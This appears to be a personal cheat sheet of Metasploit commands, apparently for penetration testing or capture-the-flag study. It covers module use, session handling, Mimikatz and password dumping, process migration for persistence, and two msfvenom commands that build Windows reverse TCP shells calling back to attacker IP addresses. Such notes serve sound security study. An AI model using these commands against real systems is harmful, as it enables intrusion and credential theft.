Metasploit Command Syntax
Metasploit, or the Metasploit Framework, is a tool used to develop and execute exploit code against remote target machines. Since this tool is very large, a separate document for its commands seemed appropriate.
Table of Contents
- Main commands to use Metasploit
- Other useful commands
- Metasploit Modules
- MSFVenom Commands
- Database/workspaces
[!NOTE] Some of these commands can only be used after a (meterpreter) shell has been established on another machine. These are marked with [session]. Others must be used outside of these shells.
Main commands to use Metasploit
search > Look for a module to use
use > Load the specific module
options > View any options you need to set
set <options> > Set the specified option
run > Run the exploit
exploit > Run the exploit
Other useful commands
[session] Information gathering
getuid > Get the current user
getprivs > Get the privileges for the current user
sysinfo > Get info on the system
[session] Kiwi/Mimikatz can be loaded into the session
[session] Menu, go back to from session
[session] Move/migrate to another process (for privileges)
[session] Passwords
Payloads
show payloads > When a module is selected it will list compatible payloads
set payload <id> > Selects the listed payload with the corresponding number.
set payload <name> > Selects the payload with the corresponding name.
[session] Privilege escalation (for Windows at least)
[session] Quitting or closing a session
Search exploits
use post/multi/recon/local_exploit_suggester > Can be used to find any vulnerabilities on the system. Does need an active session.
Searching for modules
Sessions
sessions > show all
sessions -i <id> > select and go to session
sessions -u > upgrade shell to meterpreter shell
sessions -k <id> > kill selected session
[session] Shell creation after exploiting
Shell conversion to Meterpreter
Show various possibilities (payloads/exploits etc.)
Metasploit Modules
Some useful modules that can be used in Metasploit.
run post/windows/manage/migrate
> Run the migrate module that can be used to inject into another process to create persistence
MSFVenom Commands
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.18.78.136 LPORT=443 -b '\x0a\x0d\x00' -f c
> Creates an unstaged reverse TCP shell in C format, to be used on a 32-bit Windows system.
> Attack host IP and port are also included.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
> Creates an unstaged reverse TCP shell in exe format, to be used on a 64-bit Windows system.
> Attack host IP and port are also included as well as an output name.
msfvenom argument | Function |
---|---|
-a | Specifies the architecture of the machine the payload will be used on |
-p | Specifies the payload (type) to be used |
--platform | Specifies the platform of the machine the payload will be used on |
-l / --list formats | Show all available formats |
-l / --list payloads | Show all available payloads |
-e | Specifies the encoding format |
-f | Specifies the output format (extension) |
-o | Specifies the output location |
-b | A list of characters to avoid |
Database/workspaces
Outside of Metasploit
systemctl start postgresql > Start the PostgreSQL service used by Metasploit
sudo msfdb init > Initialize and start the Metasploit database